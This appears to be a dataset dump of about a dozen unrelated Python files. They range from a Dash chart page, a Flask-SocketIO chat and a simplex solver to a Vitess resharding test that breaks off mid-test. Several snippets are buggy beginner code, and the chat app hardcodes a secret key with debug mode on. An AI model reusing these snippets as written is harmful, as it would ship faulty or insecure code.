text stringlengths 8 6.05M |
|---|
from app import app
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import charts
import helpers
# Generate Plotly content
content = html.Section(
children = [
html.Div([
html.H2("Network Analysis at a glance...", className="align-center"),
html.Div([
dcc.Dropdown(
id="corr_dir",
options=[{"label": "Positive", "value": "Positive"}, {"label": "Negative", "value": "Negative"}],
value=""
)
]),
html.Div(id="corr_network"),
html.Div([
dcc.Input(id="ego_network_count", type="text", value="0", placeholder="Top-N Ego-networks"),
], style = {
"textAlign": "center"
}),
html.Div(id="ego_network")
])
]
)
@app.callback(
Output("ego_network", "children"),
[
Input("ego_network_count", "value")
],
)
def update_ego_network(ego_network_count):
# To prevent callback error
if ego_network_count == "":
ego_network_count = 0
ego_network_count = int(ego_network_count)
ego_networks = charts.generate_ego_network(ego_network_count)
children = [
dcc.Graph(
id = f'ego_network_{i}',
figure = ego_networks[i],
config = {"displayModeBar" : False}
) for i in range(len(ego_networks))
]
return children
@app.callback(
Output("corr_network", "children"),
[
Input("corr_dir", "value")
],
)
def update_corr_network(corr_dir):
# To prevent callback error
if corr_dir == "":
corr_dir = "Positive"
children=[
dcc.Graph(
id = 'corr_network_1',
figure = charts.generate_correlation_network(corr_dir),
config = {"displayModeBar" : False}
)
]
return children |
# Generated by Django 3.0.6 on 2020-06-07 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('musicRun', '0006_spotifyuser'),
]
operations = [
migrations.AddField(
model_name='song',
name='duration',
field=models.CharField(default='0', max_length=8),
),
migrations.AlterField(
model_name='spotifyuser',
name='songs',
field=models.ManyToManyField(blank=True, to='musicRun.Song'),
),
]
|
import sys
from src.HistData.File.FileParser import FileParser
from src.HistData.Service.TimeRangeChecker import hour_range_stadistics, range_percentage
# Time is in Eastern Standard Time (EST) WITHOUT Day Light Savings adjustments
def main():
filename = 'data/HistData/2019_EUR_USD_M1.csv'
parser = FileParser(filename)
ranges = [('000000', '010000'), ('010000', '020000'), ('020000', '030000'), ('030000', '040000'),
('040000', '050000'), ('050000', '060000'), ('060000', '070000'), ('070000', '080000'),
('080000', '090000'), ('090000', '100000'), ('100000', '110000'), ('110000', '120000'),
('120000', '130000'), ('130000', '140000'), ('140000', '150000'), ('150000', '160000'),
('160000', '170000'), ('170000', '180000'), ('180000', '190000'), ('190000', '200000'),
('200000', '210000'), ('210000', '220000'), ('220000', '230000'), ('230000', '235900')] # Do not overlap with next day
for range in ranges:
start = range[0]
end = range[1]
result = hour_range_stadistics(parser.extract_candles_data(), start, end)
total = result['total']
print start + ' to ' + end + ':'
print 'bullish days: ' + str(result['bullish']) + ' - ' + range_percentage(result['bullish'], total) + ' %'
print 'bearish days: ' + str(result['bearish']) + ' - ' + range_percentage(result['bearish'], total) + ' %'
print 'equal days: ' + str(result['equal']) + ' - ' + range_percentage(result['equal'], total) + ' %'
sys.exit(1)
if __name__ == '__main__':
main()
|
import queue
masks = [[2, 1, 0, 2],
[1, 1, 1, 1],
[0, 0, 2, 1],
[0, 3, 0, 0],
[1, 0, 0, 1]]
cases = int(input())
def r(a, b, c, d):
if [a, b, c, d] in mem:
return mem[[a, b, c, d]]
else:
if a - 2 > -1 and b - 1 > -1 and d - 2 > -1:
r(a - 2, b - 1, c, d - 2)
r(a - 1, b - 1, c - 1, d - 1)
r(a, b, c - 2, d - 1)
r(a, b - 3, c, d - 0)
r(a - 1, b, c, d - 1)
for c in range(cases):
pos = list(map(int, input().split()))
mem = {}
'''
queue_sheit = queue.Queue()
queue_sheit.put([0, 0, 0, 0])
while not queue_sheit.empty():
meh = queue_sheit.get()[:]
if meh == pos:
print("Meh")
for m in masks:
meh2 = meh[:]
for i in range(4):
meh2[i] += m[i]
if meh2[i] > 30:
print(meh2)
break
else:
queue_sheit.put(meh2)
'''
|
import random
def set_the_value(): # Функція для задання і перевірки значень
while True:
try:
value = input()
if value == 'exit':
print('Програма завершила роботу')
exit()
else:
return int(value)
break
except ValueError:
print("НЕ вірні дані! Спробуй ще разочок")
def set_the_number(): # Функція для задання розміру
print("Введіть кількість елементів у масиві:")
numbers = set_the_value()
if numbers <= 0:
while numbers <= 0:
print("Масив не може бути меншим або дорівнювати нулю!!! Спробуй ще:")
numbers = set_the_value()
return numbers
def create_an_array(): # Функція для створення масиву
numbers = set_the_number()
arr = []
for i in range(numbers):
print("Введіь елемент масиву " + str(i + 1) + ":")
element = set_the_value()
arr.append(element)
return arr
def create_an_random_array(): # Функція для створення рандомного масиву
numbers = set_the_number()
arr = []
print("Введіь елемент a:")
a = set_the_value()
print("Введіь елемент b:")
b = set_the_value()
for i in range(numbers):
if a < b:
arr.append(random.randint(a, b))
elif a > b:
arr.append(random.randint(b, a))
elif a == b:
while a == b:
print("Діапазон не може бути рівний!")
print("Введіь елемент a:")
a = set_the_value()
print("Введіь елемент b:")
b = set_the_value()
return arr
def merge_two_elements(a, b): # Функція для злиття двох елементів
global count
result = []
i = j = 0
while i < len(a) and j < len(b):
if a[i] < b[j]:
result.append(a[i])
i += 1
count += 1
else:
result.append(b[j])
j += 1
count += 1
if i < len(a):
result += a[i:]
count += 1
if j < len(b):
result += b[j:]
count += 1
return result
def merge_sort(arr): # Функція для сортування масиву
global count
if len(arr) == 1:
count += 1
return arr
middle = len(arr)//2
left = merge_sort(arr[:middle])
rigth = merge_sort(arr[middle:])
count += 1
return merge_two_elements(left, rigth)
def method_selection(): #Функція для вибору методу створення масиву
print("Доброго дня, шановний користувач!\n"
"Якщо ви бажаєте ввести масив довжини N з клавіатури, то введіть 'a'\n"
"Якщо ви бажаєте згенерувати довільний масив довжини N зі значень, які знаходяться в діапазоні [a, b], де a,b вводяться з клавіатури, то введіть 'b'\n"
"Якщо ви бажаєте завершити роботу програми введіть 'exit'")
while True:
sposib = input("Ви вибираєте: ")
if sposib == 'exit':
print('Програма завершила роботу')
exit()
elif sposib == 'a':
return merge_sort(create_an_array())
elif sposib == 'b':
return merge_sort(create_an_random_array())
else:
print("Упс, помилка! Такого варіанту у нас нема. Спробуй ще раз.")
while True:
count = 0
print("Відсортований масив: " + str(method_selection()))
print("Кількість операцій, виконаних при цьому: " + str(count)) |
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit
app = Flask(__name__)
app.config['SECRET_KEY'] = 'ekisde'
app.config['DEBUG'] = True
socketio = SocketIO(app)
@app.route('/')
def index():
return render_template('index.html')
@socketio.on('message')
def chat(msg):
print('USUARIO: '+ msg)
send(msg, broadcast = True)
if __name__ == '__main__':
socketio.run(app) |
from safedelete.managers import SafeDeleteManager
class IipManager(SafeDeleteManager):
pass |
import os
import sys
import subprocess
sys.path.insert(0, 'scripts')
import experiments as exp
def find_string_between(input_str, marker1, marker2):
start = input_str.find(marker1) + len(marker1)
end = input_str.find(marker2, start)
return input_str[start:end]
def run(alignment, tree, trees, model, iqtree_prefix):
cmd = []
cmd.append(exp.iqtree_exec)
cmd.append("-s")
cmd.append(alignment)
cmd.append("-m")
cmd.append(model)
cmd.append("-pre")
cmd.append(iqtree_prefix)
cmd.append("-redo")
cmd.append("-z")
cmd.append(trees)
cmd.append("-te")
cmd.append(tree)
cmd.append("-n")
cmd.append("0")
cmd.append("-zb")
cmd.append("10000")
cmd.append("-zw")
cmd.append("-au")
cmd.append("-nt")
cmd.append(str(40))
#logs = subprocess.check_output(cmd, encoding='utf-8')
print(" ".join(cmd))
logs = subprocess.check_output(cmd)
ll = find_string_between(logs, "BEST SCORE FOUND : ", "\n")
return float(ll)
def run_tests(alignment, tree, trees, model, iqtree_prefix):
run(alignment, tree, trees, model, iqtree_prefix)
if __name__ == "__main__":
if (len(sys.argv) < 5):
print("syntax: python " + os.path.basename(__file__) + " alignment model tree trees iqtree_prefix]")
sys.exit(1)
alignment = sys.argv[1]
tree = sys.argv[2]
trees = sys.argv[3]
model = sys.argv[4]
iqtree_prefix = sys.argv[5]
run_tests(alignment, tree, trees, model, iqtree_prefix)
|
def removeDuplicates(nums):
original_len=len(nums)
initial_count = 0
for i in range(0,len(nums)-1):
j=i+1
if(nums[i]==nums[j]):
j=j+1
else:
nums[initial_count+1]=nums[j]
initial_count+=1
print nums[0:initial_count+1]
nums=[1,1,1,2,2,3,4,4,5,5,5,6,6,6,6]
removeDuplicates(nums)
|
def variance(array):
nums = map(len, array)
length = float(len(nums))
average = sum(nums) / length
return round(sum((average - a) ** 2 for a in nums) / length, 4)
|
from texttable import Texttable
import numpy as np
def inserir_matriz(matriz, restricao, pos_linha, lista_pos):
qtdColunas = len(matriz[0])
lista_aux = [0] * qtdColunas
tam = len(restricao)
for i in range(len(lista_pos)): #
pos = lista_pos[i]
lista_aux[pos] = restricao[i]
lista_aux[qtdColunas-1] = restricao[tam-1]
for i in range(qtdColunas):
matriz[pos_linha][i] = float(lista_aux[i])
return matriz
def funcao_objetiva(objetiva):
objetiva = objetiva.split(" ")
tam = len(objetiva)
lista_aux = [None] * tam
for i in range(len(objetiva)): # DETECTA SINAL NEGATIVO E APLICA À VARIAVEL
if(objetiva[i] == '-'):
tmp = objetiva[i+1]
objetiva[i+1] = '-' + tmp
for i in range(tam):
string_tmp = objetiva[i]
if(len(string_tmp) >= 3):
lista_aux[i] = string_tmp
for i in range(tam):
if(lista_aux[i] != None):
pos = len(lista_aux[i]) -2
lista_aux[i] = float(lista_aux[i][:pos]) * (-1)
lista_aux = [x for x in lista_aux if x is not None]
qtd_variaveis = len(lista_aux) + 2
lista_aux = [1] + lista_aux
return lista_aux, qtd_variaveis
def calc_pos(string):
tam = len(string)
pos = int(string[tam-1:])
return pos
def calc_restricao(restr):
restr = restr.split(" ")
tam = len(restr)
lista_aux = [None] * tam
lista_pos = [None] * tam
for i in range(len(restr)): # DETECTA SINAL NEGATIVO E APLICA À VARIAVEL
if(restr[i] == '-'):
tmp = restr[i+1]
restr[i+1] = '-' + tmp
for i in range(tam):
string_tmp = restr[i]
if(i == tam-1):
lista_aux[i] = string_tmp
break
if(len(string_tmp) >= 3):
lista_pos[i] = calc_pos(string_tmp) # CALCULA EM QUAL POS VAI CADA VARIÁVEL
lista_aux[i] = string_tmp
for i in range(tam): # FILTRA APENAS OS NÚMEROS DA RESTRICAO
if(i == (tam - 1)):
break
if(lista_aux[i] != None):
pos = len(lista_aux[i]) -2
lista_aux[i] = lista_aux[i][:pos]
lista_aux = [x for x in lista_aux if x is not None]
lista_pos = [x for x in lista_pos if x is not None]
return lista_aux, lista_pos
def coluna_entra(matriz):
qtdColunas = len(matriz[0])
menor = 0
for i in range(qtdColunas):
if (matriz[0][i] < menor):
menor = matriz[0][i]
coluna = i
return coluna
def nova_linha_pivo(matriz, qtdLinhas, coluna):
nova_linha = [None] * len(matriz[0])
qtdColunas = len(matriz[0])
menor = 999999
for i in range(1, qtdLinhas):
if(matriz[i][coluna] > 0):
pivo_tmp = float(matriz[i][qtdColunas - 1] / matriz[i][coluna])
else:
continue
if ((pivo_tmp >= 0) and (pivo_tmp < menor)):
menor = pivo_tmp
linha = i
pivo = matriz[linha][coluna]
for i in range(qtdColunas):
nova_linha[i] = matriz[linha][i] / pivo
return nova_linha, linha
def calc_nova_linha(matriz, linha_pivo, coluna, pos, linha_p):
qtdColunas = len(matriz[0])
vetor = [None] * qtdColunas
pivo = -matriz[pos][coluna]
if (linha_p == pos):
return linha_pivo
for i in range(qtdColunas):
vetor[i] = (linha_pivo[i] * pivo) + matriz[pos][i]
return vetor
def verifica_matriz(matriz):
qtdColunas = len(matriz[0])
for i in range(qtdColunas):
if (matriz[0][i] < 0):
return True
return False
def imprime_matriz(matriz, cabecalho, qtdColunas):
linha = [0] * qtdColunas
qtdeCol = ['t'] * qtdColunas # FORMATO DA TABELA 'TEXTO'
imprimir = np.insert(matriz, 0, linha, axis=0) # LISTA AUXILIAR PARA IMPRESSÃO
tabela = Texttable()
tabela.set_cols_dtype(qtdeCol)
tabela.add_rows(imprimir)
tabela.add_rows([cabecalho])
print("")
print(tabela.draw())
return None
|
import cv2 as cv
import numpy as np
from popupMessage import popupmsg
def fSwap():
city_img = cv.imread("city.jpg")
city_img = cv.cvtColor(city_img, cv.COLOR_BGR2GRAY)
city_ft = np.fft.fft2(city_img)
face_img = cv.imread("face.jpg")
face_img = cv.cvtColor(face_img, cv.COLOR_BGR2GRAY)
face_ft = np.fft.fft2(face_img)
combined1 = np.multiply(np.abs(face_ft), np.exp(1j*np.angle(city_ft)))
image1 = np.real(np.fft.ifft2(combined1)).astype(np.uint8)
combined2 = np.multiply(np.abs(city_ft), np.exp(1j*np.angle(face_ft)))
image2 = np.real(np.fft.ifft2(combined2)).astype(np.uint8)
cv.imshow("Image 1", image1)
cv.waitKey(0)
cv.destroyAllWindows()
cv.imshow("Image 2", image2)
cv.waitKey(0)
cv.destroyAllWindows()
popupmsg("The images appeared to be very distorted from the original version. However, the main details in each photo are still recognizable. Along the edges of the images, there are areas of sharp change and distortion.")
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This test simulates the first time a database has to be split.
- we start with a keyspace with a single shard and a single table
- we add and populate the sharding key
- we set the sharding key in the topology
- we clone into 2 instances
- we enable filtered replication
- we move all serving types
- we remove the source tablets
- we remove the original shard
"""
import logging
import unittest
from vtdb import keyrange_constants
import base_sharding
import environment
import tablet
import utils
# initial shard, covers everything
shard_master = tablet.Tablet()
shard_replica = tablet.Tablet()
shard_rdonly1 = tablet.Tablet()
# split shards
# range '' - 80
shard_0_master = tablet.Tablet()
shard_0_replica = tablet.Tablet()
shard_0_rdonly1 = tablet.Tablet()
# range 80 - ''
shard_1_master = tablet.Tablet()
shard_1_replica = tablet.Tablet()
shard_1_rdonly1 = tablet.Tablet()
all_tablets = [shard_master, shard_replica, shard_rdonly1,
shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1]
def setUpModule():
try:
environment.topo_server().setup()
setup_procs = [t.init_mysql() for t in all_tablets]
utils.wait_procs(setup_procs)
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in all_tablets]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
class TestInitialSharding(unittest.TestCase, base_sharding.BaseShardingTest):
# create_schema will create the same schema on the keyspace
def _create_schema(self):
# Note that the primary key columns are not defined first on purpose to test
# that a reordered column list is correctly used everywhere in vtworker.
create_table_template = '''create table %s(
msg varchar(64),
id bigint not null,
parent_id bigint not null,
primary key (parent_id, id),
index by_msg (msg)
) Engine=InnoDB'''
utils.run_vtctl(['ApplySchema',
'-sql=' + create_table_template % ('resharding1'),
'test_keyspace'],
auto_log=True)
def _add_sharding_key_to_schema(self):
if base_sharding.keyspace_id_type == keyrange_constants.KIT_BYTES:
t = 'varbinary(64)'
else:
t = 'bigint(20) unsigned'
sql = 'alter table %s add custom_ksid_col ' + t
utils.run_vtctl(['ApplySchema',
'-sql=' + sql % ('resharding1'),
'test_keyspace'],
auto_log=True)
def _mark_sharding_key_not_null(self):
if base_sharding.keyspace_id_type == keyrange_constants.KIT_BYTES:
t = 'varbinary(64)'
else:
t = 'bigint(20) unsigned'
sql = 'alter table %s modify custom_ksid_col ' + t + ' not null'
utils.run_vtctl(['ApplySchema',
'-sql=' + sql % ('resharding1'),
'test_keyspace'],
auto_log=True)
# _insert_startup_value inserts a value in the MySQL database before it
# is sharded
def _insert_startup_value(self, tablet_obj, table, mid, msg):
tablet_obj.mquery('vt_test_keyspace', [
'begin',
'insert into %s(parent_id, id, msg) values(%d, %d, "%s")' %
(table, base_sharding.fixed_parent_id, mid, msg),
'commit'
], write=True)
def _insert_startup_values(self):
self._insert_startup_value(shard_master, 'resharding1', 1, 'msg1')
self._insert_startup_value(shard_master, 'resharding1', 2, 'msg2')
self._insert_startup_value(shard_master, 'resharding1', 3, 'msg3')
def _backfill_keyspace_id(self, tablet_obj):
tablet_obj.mquery('vt_test_keyspace', [
'begin',
'update resharding1 set custom_ksid_col=0x1000000000000000 where id=1',
'update resharding1 set custom_ksid_col=0x9000000000000000 where id=2',
'update resharding1 set custom_ksid_col=0xD000000000000000 where id=3',
'commit'
], write=True)
def _check_startup_values(self):
# check first value is in the left shard
for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
self._check_value(t, 'resharding1', 1, 'msg1', 0x1000000000000000)
for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
self._check_value(t, 'resharding1', 1, 'msg1',
0x1000000000000000, should_be_here=False)
# check second value is in the right shard
for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
self._check_value(t, 'resharding1', 2, 'msg2', 0x9000000000000000,
should_be_here=False)
for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
self._check_value(t, 'resharding1', 2, 'msg2', 0x9000000000000000)
# check third value is in the right shard too
for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
self._check_value(t, 'resharding1', 3, 'msg3', 0xD000000000000000,
should_be_here=False)
for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
self._check_value(t, 'resharding1', 3, 'msg3', 0xD000000000000000)
def _insert_lots(self, count, base=0):
for i in xrange(count):
self._insert_value(shard_master, 'resharding1', 10000 + base + i,
'msg-range1-%d' % i, 0xA000000000000000 + base + i)
self._insert_value(shard_master, 'resharding1', 20000 + base + i,
'msg-range2-%d' % i, 0xE000000000000000 + base + i)
# _check_lots returns how many of the values we have, in percents.
def _check_lots(self, count, base=0):
found = 0
for i in xrange(count):
if self._is_value_present_and_correct(shard_1_replica, 'resharding1',
10000 + base + i, 'msg-range1-%d' %
i, 0xA000000000000000 + base + i):
found += 1
if self._is_value_present_and_correct(shard_1_replica, 'resharding1',
20000 + base + i, 'msg-range2-%d' %
i, 0xE000000000000000 + base + i):
found += 1
percent = found * 100 / count / 2
logging.debug('I have %d%% of the data', percent)
return percent
def _check_lots_timeout(self, count, threshold, timeout, base=0):
while True:
value = self._check_lots(count, base=base)
if value >= threshold:
return value
timeout = utils.wait_step('enough data went through', timeout)
# _check_lots_not_present makes sure no data is in the wrong shard
def _check_lots_not_present(self, count, base=0):
for i in xrange(count):
self._check_value(shard_0_replica, 'resharding1', 10000 + base + i,
'msg-range1-%d' % i, 0xA000000000000000 + base + i,
should_be_here=False)
self._check_value(shard_0_replica, 'resharding1', 20000 + base + i,
'msg-range2-%d' % i, 0xE000000000000000 + base + i,
should_be_here=False)
def test_resharding(self):
# create the keyspace with just one shard
shard_master.init_tablet(
'replica',
keyspace='test_keyspace',
shard='0',
tablet_index=0)
shard_replica.init_tablet(
'replica',
keyspace='test_keyspace',
shard='0',
tablet_index=1)
shard_rdonly1.init_tablet(
'rdonly',
keyspace='test_keyspace',
shard='0',
tablet_index=2)
for t in [shard_master, shard_replica, shard_rdonly1]:
t.create_db('vt_test_keyspace')
# replica is not started, InitShardMaster should timeout
shard_master.start_vttablet(wait_for_state=None,
binlog_use_v3_resharding_mode=False)
shard_rdonly1.start_vttablet(wait_for_state=None,
binlog_use_v3_resharding_mode=False)
for t in [shard_master, shard_rdonly1]:
t.wait_for_vttablet_state('NOT_SERVING')
# reparent to make the tablets work - expect fail
# because replica tablet is not up
_, stderr = utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
shard_master.tablet_alias], auto_log=True, expect_fail=True)
self.assertIn('Tablet test_nj-0000062345 ResetReplication failed', stderr)
# start replica
shard_replica.start_vttablet(wait_for_state=None,
binlog_use_v3_resharding_mode=False)
shard_replica.wait_for_vttablet_state('NOT_SERVING')
# reparent to make the tablets work
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
shard_master.tablet_alias], auto_log=True)
utils.wait_for_tablet_type(shard_replica.tablet_alias, 'replica')
utils.wait_for_tablet_type(shard_rdonly1.tablet_alias, 'rdonly')
for t in [shard_master, shard_replica, shard_rdonly1]:
t.wait_for_vttablet_state('SERVING')
# create the tables and add startup values
self._create_schema()
self._insert_startup_values()
# reload schema on all tablets so we can query them
for t in [shard_master, shard_replica, shard_rdonly1]:
utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True)
# We must start vtgate after tablets are up, or else wait until 1min refresh
# (that is the tablet_refresh_interval parameter for discovery gateway)
# we want cache_ttl at zero so we re-read the topology for every test query.
utils.VtGate().start(cache_ttl='0', tablets=[
shard_master, shard_replica, shard_rdonly1])
utils.vtgate.wait_for_endpoints('test_keyspace.0.master', 1)
utils.vtgate.wait_for_endpoints('test_keyspace.0.replica', 1)
utils.vtgate.wait_for_endpoints('test_keyspace.0.rdonly', 1)
# check the Map Reduce API works correctly, should use ExecuteShards,
# as we're not sharded yet.
# we have 3 values in the database, asking for 4 splits will get us
# a single query.
sql = 'select id, msg from resharding1'
s = utils.vtgate.split_query(sql, 'test_keyspace', 4)
self.assertEqual(len(s), 1)
self.assertEqual(s[0]['shard_part']['shards'][0], '0')
# change the schema, backfill keyspace_id, and change schema again
self._add_sharding_key_to_schema()
self._backfill_keyspace_id(shard_master)
self._mark_sharding_key_not_null()
# now we can be a sharded keyspace (and propagate to SrvKeyspace)
utils.run_vtctl(['SetKeyspaceShardingInfo', 'test_keyspace',
'custom_ksid_col', base_sharding.keyspace_id_type])
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'],
auto_log=True)
# run a health check on source replica so it responds to discovery
utils.run_vtctl(['RunHealthCheck', shard_replica.tablet_alias])
# create the split shards
shard_0_master.init_tablet(
'replica',
keyspace='test_keyspace',
shard='-80',
tablet_index=0)
shard_0_replica.init_tablet(
'replica',
keyspace='test_keyspace',
shard='-80',
tablet_index=1)
shard_0_rdonly1.init_tablet(
'rdonly',
keyspace='test_keyspace',
shard='-80',
tablet_index=2)
shard_1_master.init_tablet(
'replica',
keyspace='test_keyspace',
shard='80-',
tablet_index=0)
shard_1_replica.init_tablet(
'replica',
keyspace='test_keyspace',
shard='80-',
tablet_index=1)
shard_1_rdonly1.init_tablet(
'rdonly',
keyspace='test_keyspace',
shard='80-',
tablet_index=2)
for t in [shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1]:
t.create_db('vt_test_keyspace')
t.start_vttablet(wait_for_state=None,
binlog_use_v3_resharding_mode=False)
for t in [shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1]:
t.wait_for_vttablet_state('NOT_SERVING')
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/-80',
shard_0_master.tablet_alias], auto_log=True)
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/80-',
shard_1_master.tablet_alias], auto_log=True)
for t in [shard_0_replica, shard_1_replica]:
utils.wait_for_tablet_type(t.tablet_alias, 'replica')
for t in [shard_0_rdonly1, shard_1_rdonly1]:
utils.wait_for_tablet_type(t.tablet_alias, 'rdonly')
sharded_tablets = [shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1]
for t in sharded_tablets:
t.wait_for_vttablet_state('SERVING')
# must restart vtgate after tablets are up, or else wait until 1min refresh
# we want cache_ttl at zero so we re-read the topology for every test query.
utils.vtgate.kill()
utils.vtgate = None
utils.VtGate().start(cache_ttl='0', tablets=[
shard_master, shard_replica, shard_rdonly1,
shard_0_master, shard_0_replica, shard_0_rdonly1,
shard_1_master, shard_1_replica, shard_1_rdonly1])
var = None
# Wait for the endpoints, either local or remote.
utils.vtgate.wait_for_endpoints('test_keyspace.0.master', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.0.replica', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.0.rdonly', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.-80.master', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.-80.replica', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.-80.rdonly', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.80-.master', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.80-.replica', 1, var=var)
utils.vtgate.wait_for_endpoints('test_keyspace.80-.rdonly', 1, var=var)
# check the Map Reduce API works correctly, should use ExecuteKeyRanges now,
# as we are sharded (with just one shard).
# again, we have 3 values in the database, asking for 4 splits will get us
# a single query.
sql = 'select id, msg from resharding1'
s = utils.vtgate.split_query(sql, 'test_keyspace', 4)
self.assertEqual(len(s), 1)
self.assertEqual(s[0]['key_range_part']['keyspace'], 'test_keyspace')
# There must be one empty KeyRange which represents the full keyspace.
self.assertEqual(len(s[0]['key_range_part']['key_ranges']), 1)
self.assertEqual(s[0]['key_range_part']['key_ranges'][0], {})
utils.check_srv_keyspace('test_nj', 'test_keyspace',
'Partitions(master): -\n'
'Partitions(rdonly): -\n'
'Partitions(replica): -\n',
keyspace_id_type=base_sharding.keyspace_id_type,
sharding_column_name='custom_ksid_col')
# we need to create the schema, and the worker will do data copying
for keyspace_shard in ('test_keyspace/-80', 'test_keyspace/80-'):
utils.run_vtctl(['CopySchemaShard',
'--exclude_tables', 'unrelated',
shard_rdonly1.tablet_alias,
keyspace_shard],
auto_log=True)
utils.run_vtctl(['RunHealthCheck', shard_rdonly1.tablet_alias])
# Run vtworker as daemon for the following SplitClone commands.
worker_proc, worker_port, worker_rpc_port = utils.run_vtworker_bg(
['--cell', 'test_nj', '--command_display_interval', '10ms',
'--use_v3_resharding_mode=false'],
auto_log=True)
# Initial clone (online).
workerclient_proc = utils.run_vtworker_client_bg(
['SplitClone',
'--offline=false',
'--exclude_tables', 'unrelated',
'--chunk_count', '10',
'--min_rows_per_chunk', '1',
'--min_healthy_rdonly_tablets', '1',
'test_keyspace/0'],
worker_rpc_port)
utils.wait_procs([workerclient_proc])
self.verify_reconciliation_counters(worker_port, 'Online', 'resharding1',
3, 0, 0, 0)
# Reset vtworker such that we can run the next command.
workerclient_proc = utils.run_vtworker_client_bg(['Reset'], worker_rpc_port)
utils.wait_procs([workerclient_proc])
# Modify the destination shard. SplitClone will revert the changes.
# Delete row 1 (provokes an insert).
shard_0_master.mquery('vt_test_keyspace',
'delete from resharding1 where id=1', write=True)
# Delete row 2 (provokes an insert).
shard_1_master.mquery('vt_test_keyspace',
'delete from resharding1 where id=2', write=True)
# Update row 3 (provokes an update).
shard_1_master.mquery('vt_test_keyspace',
"update resharding1 set msg='msg-not-3' where id=3",
write=True)
# Insert row 4 (provokes a delete).
self._insert_value(shard_1_master, 'resharding1', 4, 'msg4',
0xD000000000000000)
workerclient_proc = utils.run_vtworker_client_bg(
['SplitClone',
'--exclude_tables', 'unrelated',
'--chunk_count', '10',
'--min_rows_per_chunk', '1',
'--min_healthy_rdonly_tablets', '1',
'test_keyspace/0'],
worker_rpc_port)
utils.wait_procs([workerclient_proc])
self.verify_reconciliation_counters(worker_port, 'Online', 'resharding1',
2, 1, 1, 0)
self.verify_reconciliation_counters(worker_port, 'Offline', 'resharding1',
0, 0, 0, 3)
# Terminate worker daemon because it is no longer needed.
utils.kill_sub_process(worker_proc, soft=True)
# check the startup values are in the right place
self._check_startup_values()
# check the schema too
utils.run_vtctl(['ValidateSchemaKeyspace', 'test_keyspace'], auto_log=True)
# check the binlog players are running
logging.debug('Waiting for binlog players to start on new masters...')
self.check_destination_master(shard_0_master, ['test_keyspace/0'])
self.check_destination_master(shard_1_master, ['test_keyspace/0'])
# check that binlog server exported the stats vars
self.check_binlog_server_vars(shard_replica, horizontal=True)
# testing filtered replication: insert a bunch of data on shard 1,
# check we get most of it after a few seconds, wait for binlog server
# timeout, check we get all of it.
logging.debug('Inserting lots of data on source shard')
self._insert_lots(1000)
logging.debug('Checking 80 percent of data is sent quickly')
v = self._check_lots_timeout(1000, 80, 5)
if v != 100:
logging.debug('Checking all data goes through eventually')
self._check_lots_timeout(1000, 100, 20)
logging.debug('Checking no data was sent the wrong way')
self._check_lots_not_present(1000)
self.check_binlog_player_vars(shard_0_master, ['test_keyspace/0'],
seconds_behind_master_max=30)
self.check_binlog_player_vars(shard_1_master, ['test_keyspace/0'],
seconds_behind_master_max=30)
self.check_binlog_server_vars(shard_replica, horizontal=True,
min_statements=1000, min_transactions=1000)
# use vtworker to compare the data
for t in [shard_0_rdonly1, shard_1_rdonly1]:
utils.run_vtctl(['RunHealthCheck', t.tablet_alias])
if base_sharding.use_multi_split_diff:
logging.debug('Running vtworker MultiSplitDiff for 0')
utils.run_vtworker(['-cell', 'test_nj',
'--use_v3_resharding_mode=false',
'MultiSplitDiff',
'--min_healthy_rdonly_tablets', '1',
'test_keyspace/0'],
auto_log=True)
else:
logging.debug('Running vtworker SplitDiff for -80')
utils.run_vtworker(['-cell', 'test_nj',
'--use_v3_resharding_mode=false',
'SplitDiff',
'--min_healthy_rdonly_tablets', '1',
'test_keyspace/-80'],
auto_log=True)
logging.debug('Running vtworker SplitDiff for 80-')
utils.run_vtworker(['-cell', 'test_nj',
'--use_v3_resharding_mode=false',
'SplitDiff',
'--min_healthy_rdonly_tablets', '1',
'test_keyspace/80-'],
auto_log=True)
utils.pause('Good time to test vtworker for diffs')
# get status for the destination master tablet, make sure we have it all
self.check_running_binlog_player(shard_0_master, 2000, 2000)
self.check_running_binlog_player(shard_1_master, 6000, 2000)
# check we can't migrate the master just yet
